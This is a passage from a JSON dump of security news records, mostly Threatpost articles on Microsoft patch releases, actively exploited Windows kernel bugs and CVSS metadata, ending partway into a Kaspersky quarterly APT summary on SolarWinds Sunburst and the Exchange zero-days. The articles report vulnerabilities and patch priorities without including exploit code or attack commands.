This resulted in the installation for the update halting at 24 percent.\n\nWindows users \u2013 who [reported issues](<https://www.askwoody.com/tag/kb5001078/>) \u2013 must install this new servicing stack update before installing its recent February Patch Tuesday security update from last week.\n\n\u201cYou must install the new servicing-stack update (SSU) [KB5001078 ](<https://support.microsoft.com/en-us/topic/kb5001078-servicing-stack-update-for-windows-10-version-1607-february-12-2021-3e19bfd1-7711-48a8-978b-ce3620ec6362>)before installing this cumulative update (LCU),\u201d according to Microsoft. \u201cSSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes.\u201d\n\n## **How Windows Users Can Mitigate if They Already Installed KB4601392**\n\nMicrosoft gave the following mitigation advice for devices that have already installed KB4601392:\n\n * Users should restart their devices and then follow only steps 1, 2 and 4a from [Reset Windows Update components manually.](<https://docs.microsoft.com/en-us/windows/deployment/update/windows-update-resources#reset-windows-update-components-manually>)\n * They should then restart their devices again.\n * [KB5001078](<https://support.microsoft.com/help/5001078>) should now install from Windows Update when users select \u201ccheck for updates\u201d \u2013 or they can wait for it to install automatically.\n * Users should then be able to install the latest Cumulative Update from Windows Update.\n\nFor Windows users who haven\u2019t applied the previous update, the new update \u201cis available through Windows Update,\u201d said Microsoft. 
\u201cIt will be downloaded and installed automatically.\u201d\n\nTo get the stand-alone package for the update, users can also go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5001078>) website, Microsoft said.\n\n## **Patch Tuesday Security Updates: Apply Now **\n\nMicrosoft\u2019s February Patch Tuesday from last week addressed nine critical-severity cybersecurity bugs, plus an important-rated vulnerability that is being actively exploited in the wild.\n\nThe bug tracked as [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>),** **is being actively exploited, according to Microsoft\u2019s advisory. This underscores the need for sysadmins to quickly apply the update. This is why the faulty servicing-stack update creating an obstacle for deploying Patch Tuesday updates is an issue for companies.\n\n\u201cThe exploitation of this vulnerability would allow an attacker to execute code in the context of the kernel and gain SYSTEM privileges, essentially giving the attacker free rein to do whatever they wanted with the compromised machine,\u201d said Chris Hass, director of Information Security and Research at Automox, in an email.\n\n\u201cBecause this vulnerability is already being used by attackers, patching this vulnerability as soon as possible is absolutely crucial,\u201d said Hass.\n\n### _Is your small- to medium-sized business an easy mark for attackers?_\n\n**Threatpost WEBINAR:** _ Save your spot for __\u201c_**15 Cybersecurity Gaffes SMBs Make**_,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. 
_[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this _**_LIVE_****_ _**_webinar on Wed., Feb. 24._\n", "cvss3": {}, "published": "2021-02-16T16:47:36", "type": "threatpost", "title": "Microsoft Pulls Bad Windows Update After Patch Issue", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1732"], "modified": "2021-02-16T16:47:36", "id": "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0", "href": "https://threatpost.com/microsoft-windows-update-patch-tuesday/163981/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Security teams might have skipped January\u2019s Patch Tuesday after reports of it breaking servers, but it also included a patch for a privilege-escalation bug in Windows 10 that leaves unpatched systems open to malicious actors looking for administrative access. It\u2019s a bug that now has a proof-of-concept exploit [available in the wild](<https://github.com/gdabah/win32k-bugs/blob/master/console.cpp>).\n\nThe exploit was released by Gil Dabah, founder and CEO of Privacy Piiano, who tweeted that he decided not to report the bug two years ago after finding it difficult to get paid on other bug bounties through the Microsoft program.\n\n> Found it two years ago. Not recently. That\u2019s the point. 
<https://t.co/PtRuNDAEYQ>\n> \n> \u2014 Gil Dabah (@_arkon) [January 26, 2022](<https://twitter.com/_arkon/status/1486449470741135362?ref_src=twsrc%5Etfw>)\n\n## **The LPE Bug **\n\n\u201cA local, authenticated attacker could gain elevated local system or [administrator privileges](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) through a vulnerability in the Win32k.sys driver,\u201d Microsoft explained in its advisory, part of [January\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/>).\n\nThe [disclosure for CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-21882.html>) from RyeLv, who is credited with the find, was published on Jan. 13 and described the [win32k object type confusion](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) vulnerability.\n\n\u201cThe attacker can call the relevant GUI API at the user_mode to make the kernel call like xxxMenuWindowProc, xxxSBWndProc, xxxSwitchWndProc, xxxTooltipWndProc, etc.,\u201d the disclosure by RyeLv said.\n\n\u201cThese kernel functions will trigger a callback xxxClientAllocWindowClassExtraBytes. Attacker can intercept this callback through hook xxxClientAllocWindowClassExtraBytes in KernelCallbackTable, and use the NtUserConsoleControl method to set the ConsoleWindow flag of the tagWND object, which will modify the window type.\u201d\n\nThe bug was being exploited by sophisticated groups as a zero-day issue, Microsoft said.\n\n> Regarding the just-fixed CVE-2022-21882: \nwin32k privilege escalation vulnerability, \nCVE-2021-1732 patch bypass,easy to exploit,which was used by apt attacks\n> \n> \u2014 b2ahex (@b2ahex) [January 12, 2022](<https://twitter.com/b2ahex/status/1481233350840893442?ref_src=twsrc%5Etfw>)\n\n## **Microsoft Needs to Up Its Bug Bounty Game? 
**\n\nJanuary\u2019s Patch Tuesday was plagued by [Windows server update issues](<https://threatpost.com/microsoft-yanks-buggy-windows-server-updates/177648/>) that could have understandably made internal security teams pause before downloading the patches. But a PoC is now available for the bug, putting exploitation in reach of cybercriminals of all levels of expertise.\n\nDabah said that Microsoft\u2019s bug-bounty program was problematic.\n\n> The reason I didn\u2019t disclose it, was because I waited to get paid by Msft for long time for other stuff. By the time they paid they reduced awards to nothing almost. I was already busy with my startup and that\u2019s the story how it went unfixed. [@ja_wreck](<https://twitter.com/ja_wreck?ref_src=twsrc%5Etfw>) <https://t.co/PtRuNDAEYQ>\n> \n> \u2014 Gil Dabah (@_arkon) [January 28, 2022](<https://twitter.com/_arkon/status/1487005745023537157?ref_src=twsrc%5Etfw>)\n\nInvesting in the program was the primary recommendation in RyeLv\u2019s technical analysis to Microsoft.\n\nHe noted how to \u201ckill the bug class\u201d: \u201cImprove the kernel zero-day bounty, let more security researchers participate in the bounty program, and help the system to be more perfect.\u201d\n\nIt should be noted that Microsoft has been willing to throw additional funding at [bug-bounty programs](<https://threatpost.com/microsoft-30k-teams-bugs/165037/>) for other high-profile products, including last spring\u2019s announcement the company would pay up to $30,000 for Teams bugs.\n\nThe computing giant did not immediately return a request for comment.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-31T21:59:35", "type": "threatpost", "title": "Public Exploit Released for Windows 10 Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-01-31T21:59:35", "id": "THREATPOST:9673D04DAD513AC05EA6440633D75339", "href": "https://threatpost.com/public-exploit-windows-10-bug/178135/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:54:27", "description": "Microsoft followed through and today patched a zero-day vulnerability being exploited in public attacks that was [disclosed by Google researchers](<https://threatpost.com/google-reveals-windows-kernel-zero-day-under-attack/121689/>) nine days ago.\n\nThe victims have yet to have been identified, but [Microsoft did accuse the Sofacy APT gang](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) of carrying out the attacks. Sofacy is generally thought to have ties to Russian military intelligence and its targets are strategic, such as government and diplomatic agencies, military and defense contractors, and public policy think-tanks.\n\nGoogle\u2019s disclosure on Oct. 
31 came 10 days after it privately reported the vulnerability to Microsoft, along with a Flash zero day to Adobe also used in these attacks.\n\nAdobe patched the Flash vulnerability with an [emergency update](<https://threatpost.com/adobe-patches-flash-zero-day-under-attack/121567/>) released on Oct. 26, but Microsoft failed to publicly acknowledge the bug until only after Google publicly disclosed it. Google\u2019s internal policy gives vendors seven days to publicly report or patch vulnerabilities being actively exploited.\n\nGoogle said the vulnerability is a local privilege escalation in the Windows kernel that leads to a sandbox escape.\n\n\u201cIt can be triggered via the win32k.sys system call NtSetWindowLongPtr() for the index GWLP_ID on a window handle with GWL_STYLE set to WS_CHILD,\u201d Google\u2019s Neel Mehta and Billy Leonard said in their [disclosure](<https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html>).\n\nThe attackers chained this bug and the Flash zero day in order to get on targeted computers. The sandbox escape allows the attacker to run code in kernel mode.\n\n\u201cMicrosoft implemented new exploit mitigations in the Windows 10 Anniversary Update version of the win32k kernel component,\u201d Microsoft said in its bulletin, [MS16-135](<https://technet.microsoft.com/library/security/MS16-135>). \u201cThese Windows 10 Anniversary Update mitigations, which were developed based on proactive internal research, stop all observed in-the-wild instances of this exploit.\u201d\n\nMS16-135 also patched two other elevation of privilege vulnerabilities in the Windows kernel (CVE-2016-7215 and CVE-2016-7246), as well as an information disclosure bug in the kernel that opens the door for a kernel ASLR bypass (CVE-2016-7214), and a separate information disclosure bug in the Windows browser.sys kernel-mode driver (CVE-2016-7218).\n\nSix of the 14 bulletins put out by Microsoft today are rated critical. 
One, [MS16-132](<https://technet.microsoft.com/library/security/MS16-132>), included another vulnerability under attack in the Windows Graphics Component. Microsoft said a remote code execution Open Type Font vulnerability was patched in the Windows font library.\n\nThat bulletin patched three other flaws, including an information disclosure flaw in Open Type Font, specifically in the ATMFD component, which leaks enough information to carry out a further compromise. Also addressed were remote code execution memory corruption vulnerabilities in Windows Animation Manager and Windows Media Foundation.\n\nMicrosoft also provided cumulative updates for its browsers, Edge and Internet Explorer. The Edge update, [MS16-129](<https://technet.microsoft.com/library/security/MS16-129>), patched 17 vulnerabilities, most of which lead to remote code execution. Two of the flaws, CVE-2016-7209 and CVE-2016-7199, were publicly disclosed, Microsoft said, but not used in in-the-wild attacks. The second disclosed bug was also patched in the Internet Explorer update, [MS16-142](<https://technet.microsoft.com/library/security/MS16-142>), which patched seven CVEs.\n\n[MS16-130](<https://technet.microsoft.com/library/security/MS16-130>) patched three critical Windows bugs, a remote code execution flaw in the way Windows\u2019 image file loading handles malformed image files, along with two elevation of privilege flaws in Windows IME and Windows Task Scheduler.\n\nAnother remote code execution vulnerability was addressed in [MS16-131](<https://technet.microsoft.com/library/security/MS16-131>) in the Microsoft Video Control component. 
The remaining critical bulletin is the Adobe Flash Player update for IE and Edge; Adobe released an update today for Flash Player patching [nine remote code execution flaws](<https://threatpost.com/adobe-patches-nine-code-execution-flaws-in-flash-player/121839/>) in the software.\n\nThough rated important by Microsoft, an Office bulletin, [MS16-133](<https://technet.microsoft.com/library/security/MS16-133>), also merits attention because it patches a dozen vulnerabilities including 10 that lead to remote code execution. None of the Office bugs are being publicly attacked, Microsoft said.\n\nMicrosoft also patched SQL Server, addressing a half-dozen elevation of privilege and information disclosure vulnerabilities in [MS16-136](<https://technet.microsoft.com/library/security/MS16-136>). Three of the EoP bugs are in the SQL Server RDBMS engine, along with a cross-site scripting flaw in SQL Server MDS, an information disclosure issue in SQL Analysis Services, and another EoP issue in the SQL Server Engine Server Agent.\n\n\u201cThe top priority for most administrators will be to quickly deploy fixes for browsers, graphics components, and Office. All of these components are affected by one or more code execution vulnerabilities Microsoft has classified as highly exploitable,\u201d said Craig Young, security researcher at Tripwire. 
\u201cThese are of the highest priority due to the fact that the vulnerabilities can potentially be triggered through normal web browsing activities giving an external attacker a way into networks.\u201d\n\nThe remaining bulletins are also rated important:\n\n * [MS16-134](<https://technet.microsoft.com/library/security/MS16-134>) patches 10 elevation of privilege flaws in the Windows Common Log File System (CLFS)\n * [MS16-137](<https://technet.microsoft.com/library/security/MS16-137>) patches three vulnerabilities in Windows NTLM, Virtual Secure Mode and Local Security Authority Subsystem Service\n * [MS16-138](<https://technet.microsoft.com/library/security/MS16-138>) patches four elevation of privilege vulnerabilities in the Windows Virtual Hard Disk Driver\n * [MS16-139](<https://technet.microsoft.com/library/security/MS16-139>) patches a local Windows kernel elevation of privilege flaw in how the Windows Kernel API enforces permissions\n * [MS16-140](<https://technet.microsoft.com/library/security/MS16-140>) patches a security feature bypass in the Windows Secure Boot component; an attacker could disable code integrity checks and allow test-signed executables and drivers to be loaded.\n", "cvss3": {}, "published": "2016-11-08T14:57:26", "type": "threatpost", "title": "Microsoft Patches Zero Day Disclosed by Google", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-7199", "CVE-2016-7209", "CVE-2016-7214", "CVE-2016-7215", "CVE-2016-7218", "CVE-2016-7246", "CVE-2016-7255"], "modified": "2016-11-08T20:23:12", "id": "THREATPOST:F10810414F1898BE0159A069C1B719B2", "href": "https://threatpost.com/microsoft-patches-zero-day-disclosed-by-google/121851/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-02-09T22:45:30", "description": "Microsoft has addressed nine critical-severity cybersecurity bugs in February\u2019s Patch Tuesday updates, plus an important-rated vulnerability that is being 
actively exploited in the wild.\n\nSix of the security holes \u2013 including one of the critical bugs \u2013 were already publicly disclosed.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOverall, the computing giant has released patches for 56 CVEs covering Microsoft Windows components, the .NET Framework, Azure IoT, Azure Kubernetes Service, Microsoft Edge for Android, Exchange Server, Office and Office Services and Web Apps, Skype for Business and Lync, and Windows Defender.\n\n## **Actively Exploited Security Bug in Windows Kernel**\n\nThe security bug tracked as [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>)** **is being actively exploited, according to Microsoft\u2019s advisory. It carries a vulnerability-severity rating of 7.8 on the CVSS scale, making it important in severity \u2013 however, researchers said it deserves attention above some of the critical bugs in terms of patching priority.\n\nIt exists in the Windows Win32k operating system kernel and is an elevation-of-privilege (EoP) vulnerability. It would allow a logged-on user to execute code of their choosing with higher privileges, by running a specially crafted application. If successful, attackers could execute code in the context of the kernel and gain SYSTEM privileges, essentially giving the attacker free rein to do whatever they wanted on the compromised machine.\n\n\u201cThe vulnerability affects Windows 10 and corresponding server editions of the Windows OS,\u201d said Chris Goettl, senior director of product management and security at Ivanti. \u201cThis is a prime example of why risk-based prioritization is so important. If you base your prioritization off of vendor severity and focus on \u2018critical\u2019 you could have missed this vulnerability in your prioritization. 
This vulnerability should put Windows 10 and Server 2016 and later editions into your priority bucket for remediation this month.\u201d\n\n## **Critical Microsoft Bugs for February Patch Tuesday**\n\nNone of the critical bugs rate more than an 8.8 (out of 10) on the CVSS scale, but all allow for remote code execution (RCE) and many should take top priority, according to security researchers.\n\n * ### Publicly Known .NET Core/Visual Studio Bug\n\nFor instance, the bug tracked as [CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>) exists in .NET Core and Visual Studio \u2013 it\u2019s the only critical-rated bug to be listed as publicly known.\n\n\u201cWithout more information from Microsoft, that\u2019s about all we know about it,\u201d said Dustin Childs, of Trend Micro\u2019s Zero Day Initiative, in [an analysis](<https://www.zerodayinitiative.com/blog/2021/2/9/the-february-2022-security-update-review>) released Tuesday. \u201cBased on the CVSS severity scale, this could allow remote, unauthenticated attackers to execute arbitrary code on an affected system. Regardless, if you rely on the .NET Framework or .NET Core, make sure you test and deploy this one quickly.\u201d\n\n * ### **Windows Fax Bugs**\n\nOther critical bugs should be on researchers\u2019 radars. The bugs tracked as [CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) and [CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) meanwhile are both Windows Fax Service RCE problems.\n\n\u201cWindows Fax Service specifies settings for faxes, including how they are sent, received, viewed and printed,\u201d said Eric Feldman, senior product marketing manager at Automox. 
\u201cThe Windows Fax Service is used by the Windows Fax and Scan application included in all versions of Microsoft Windows 7, Windows 8 and Windows 10 and some earlier versions.\u201d\n\nAn attacker who successfully exploited either vulnerability could take control of an affected system, and then be able to install programs; view, change or delete data; or create new accounts with full user rights.\n\n\u201cUsers whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\u201d Feldman said. \u201cEven if you do not use Windows Fax and Scan, the Windows Fax Services is enabled by default.\u201d\n\n * ### **Critical TCP/IP Bugs**\n\n[CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) and [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) are both Windows TCP/IP RCE vulnerabilities. The former is found in the way Windows handles IPv4 source routing; the latter is found in the way Windows handles IPv6 packet reassembly.\n\n\u201cIPv4 source routing\u2026should be disabled by default,\u201d said Childs. \u201cYou can also block source routing at firewalls or other perimeter devices. 
The IPv6 bug involves packet fragmentation where a large number of fragments could lead to code execution.\u201d\n\nResearchers said that both these patches should be prioritized.\n\n\u201cBecause these affect the network stack, require zero interaction from a user and can be exploited by sending malicious network traffic to a device, it\u2019s only a matter of time before we see attackers leveraging these vulnerabilities to carry out cyberattacks,\u201d Chris Hass, director of information security and research at Automox, said.\n\nKevin Breen, director of cyber threat research at Immersive Labs, said that the IPv6 security hole is an obvious target for hackers.\n\n\u201cCVE-2021-24094 would be an obvious target because it affects a network stack, which typically operates with system level permissions and could therefore gain an attacker a system shell,\u201d he said. \u201cAs an IPV6 Link local attack it would require the threat actor to already have a foothold in your network, but could ultimately lead to a high level of access on domain controllers, for example. This vulnerability would be most dangerous to those who operate a flat network. Segmentation will help with mitigation.\u201d\n\nBreen also pointed out that RCE isn\u2019t the only possible outcome of an exploit for this bug.\n\n\u201cThe release notes indicate that the exploit is \u2018complex\u2019 \u2013 which means attempted attacks may serve to cause systems to crash, giving it the potential to be used in a denial-of-service attack,\u201d he said.\n\n * ### **Flaw in Windows Codec Pack**\n\nWindows Camera Codec Pack is home to yet another critical RCE bug ([CVE-2021-24091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24091>)). 
If successfully exploited, an attacker could run arbitrary code in the context of the current user.\n\n\u201cIf the current user is logged on with admin privileges, the attacker could gain control of the affected system,\u201d said Justin Knapp, senior product marketing manager at Automox. \u201cThis could enable an attacker to install programs; view, change, or delete data; or create new accounts with full user rights. Exploitation of the vulnerability requires the user to open a specially crafted file with an affected version of the codec pack. While there\u2019s no way to force a user to open the file, bad actors could manipulate a user through an email or web-based attack vector where the user is effectively convinced or enticed into opening the malicious file.\u201d\n\n * ### **Windows DNS Problems**\n\nAnd Windows Domain Name System (DNS) servers, when they fail to properly handle requests, are also open to a critical RCE bug ([CVE-2021-24078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24078>)) that could allow an attacker to run arbitrary code in the context of the Local System Account.\n\n\u201cOnly Windows servers that are configured as DNS servers are at risk of having this vulnerability exploited,\u201d Knapp said. \u201cTo exploit the vulnerability, an unauthenticated attacker could send malicious requests to the Windows DNS server. 
Given the low level of attack complexity and \u2018exploitation more likely\u2019 label assigned, this is a vulnerability that should be addressed immediately.\u201d\n\n * ### **Windows Print Spooler**\n\nAlso of note, _[CVE-2021-24088](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24088>)_ affects the Windows Local Spooler, which is an important component within the Windows operating system that stores print jobs in memory until the printer is ready to accept them.\n\nIt\u2019s a bug that \u201ccould be a big concern,\u201d according to Allan Liska, senior security architect at Recorded Future.\n\n\u201cThis vulnerability impacts Windows 7 to 10 and Windows Server 2008 to 2019,\u201d he said. \u201cWindows Print Spooler vulnerabilities have been widely exploited in the wild going back to the days of Stuxnet. Just last year CVE-2020-0986 was seen by Kaspersky being [widely exploited in the wild.](<https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/>)\u201d\n\n * ### **Other Critical February 2021 Microsoft Bugs**\n\nAnd finally, .NET Core for Linux is also at risk for RCE ([CVE-2021-24112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24112>)); and [CVE-2021-24093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24093>) is a critical RCE vulnerability in the Windows graphic component. Details are scant for both, but of the latter, Breen said, \u201cThis is the kind of vulnerability built into exploit kits and triggered by low level phishing campaigns targeting users en masse.\u201d\n\nAnd, a critical bug that would allow RCE exists in the Microsoft Windows Codecs Library ([CVE-2021-24081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24081>)). Details are sparse, but Microsoft said that the difficulty required for exploitation is considered to be low. 
However, end-user interaction is required for successful exploitation.\n\n### **Publicly Disclosed Bugs of Note**\n\nOutside of the critical issues, [CVE-2021-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1733>) is a high-severity EoP vulnerability discovered to be impacting Sysinternals PsExec utility that deserves a look. It\u2019s listed as being publicly disclosed.\n\n\u201cPsExec which has been popular in the past for use in remote administration tasks such as patching remote systems, has also had a fair share of scrutiny due the utility\u2019s weaponization by criminals in malware,\u201d Nicholas Colyer, senior product marketing manager at Automox, said via email. \u201cProof-of-concept code has not been independently verified but it is notable that in January 2021, Microsoft released a patch to resolve a remote code-execution vulnerability for the same utility, indicating that it is getting attention. Robust endpoint management is necessary for any organization\u2019s continued success and it is advisable to consider alternatives in the modern era of software-as-a-service.\u201d\n\nThe other publicly reported vulnerabilities this month are [CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>), an EoP vulnerability in Windows Installer; [CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>), a DoS vulnerability in the Windows Console Driver; [CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>), an information-disclosure vulnerability in Windows DirectX; and [CVE-2021-1721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1721>), a .NET Core and Visual Studio DoS problem.\n\n## **Zerologon Redux**\n\nMicrosoft also again released the patch for the Netlogon vulnerability (CVE-2020-1472), which originally was resolved in August. 
The vulnerability has [consistently been exploited](<https://threatpost.com/microsoft-warns-zerologon-bug/160769/>) by threat actors, so the re-release serves to highlight its importance. Microsoft also, starting Tuesday, [began blocking by default](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) any vulnerable connections on devices that could be used to exploit the flaw. It does this by enabling domain controller \u201cenforcement mode.\u201d\n\n\u201cWhen you consider that Zerologon led the U.S. government to issue an Emergency Directive to all federal agencies to promptly apply the patches for this vulnerability, you start to understand the gravity of the situation,\u201d Satnam Narang, staff research engineer at Tenable, told Threatpost. \u201cZerologon provides attackers a reliable way to move laterally once inside a network, giving them the ability to impersonate systems, alter passwords, and gain control over the proverbial keys to the kingdom via the domain controller itself.\u201d\n\nHe added, \u201cFor these reasons, Zerologon has been rolled into attacker playbooks, becoming a feather in the cap for post-compromise activity. We\u2019ve also seen reports of Zerologon being favored by ransomware groups like Ryuk during their campaigns.\u201d\n\n## **What Should IT Patch First?**\n\n\u201cWindows OS updates and [Adobe Acrobat and Reader](<https://threatpost.com/critical-adobe-windows-flaw/163789/>) need immediate attention with the list of exploited and publicly disclosed vulnerabilities,\u201d said Goettl.\n\nAfter that, development tools and IT tools \u201cneed some attention,\u201d he added.\n\n\u201c.Net Core and PsExec disclosures are a concern that should not go unaddressed. 
Because this development and IT tools do not follow the same update process as OS and application updates, it is important to review your DevOps processes and determine if you are able to detect and respond to updates for common dev components,\u201d he said. \u201cFor tools like PsExec it is important to understand your software inventory and where these tools are installed and ensure you can distribute updated versions as needed.\u201d\n\n**_Is your business an easy mark? _**_Save your spot for \u201c15 Cybersecurity Gaffes SMBs Make,\u201d **a **_**[_FREE Threatpost webinar_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>) **_**on Feb. 24 at 2 p.m. ET.** Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. __[Register here](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)__ for the Wed., Feb. 24 LIVE webinar. 
_\n", "cvss3": {}, "published": "2021-02-09T22:33:08", "type": "threatpost", "title": "Actively Exploited Windows Kernel Bug Allows Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0986", "CVE-2020-1472", "CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24081", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24106", "CVE-2021-24112", "CVE-2021-26701"], "modified": "2021-02-09T22:33:08", "id": "THREATPOST:1502920D4F50B0D128077B515815C023", "href": "https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-04-27T12:27:51", "description": "\n\nFor four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q1 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nIn December, SolarWinds, a well-known IT managed services provider, fell victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised. 
This resulted in the deployment of a custom backdoor, named Sunburst, on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia. In [our initial report on Sunburst](<https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/>), we examined the method used by the malware to communicate with its C2 (command-and-control) server and the protocol used to upgrade victims for further exploitation. Further investigation of the Sunburst backdoor revealed several [features that overlap with a previously identified backdoor known as Kazuar](<https://securelist.com/sunburst-backdoor-kazuar/99981/>), a .NET backdoor first reported in 2017 and tentatively linked to the Turla APT group. The shared features between Sunburst and Kazuar include the victim UID generation algorithm, code similarities in the initial sleep algorithm and the extensive usage of the FNV1a hash to obfuscate string comparisons. There are several possibilities: Sunburst may have been developed by the same group as Kazuar; the developers of Sunburst may have adopted some ideas or code from Kazuar; both groups obtained their malware from the same source; some Kazuar developers moved to another team, taking knowledge and tools with them; or the developers of Sunburst introduced these links as a form of false flag. Hopefully, further analysis will make things clearer.\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called "limited and targeted attacks". At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity's telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. 
Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. Prior to the posts, on February 28, we identified related exploitation on less than a dozen Exchange systems; we also found more than a dozen Exchange artefacts indicating exploitation uploaded to multi-scanner services. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits are now available to multiple groups.\n\nWe have also discovered a campaign active since mid-March targeting governmental entities in the Russian Federation, using the aforementioned Exchange zero-day exploits. This campaign made use of a previously unknown malware family we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\n## Europe\n\nDuring routine 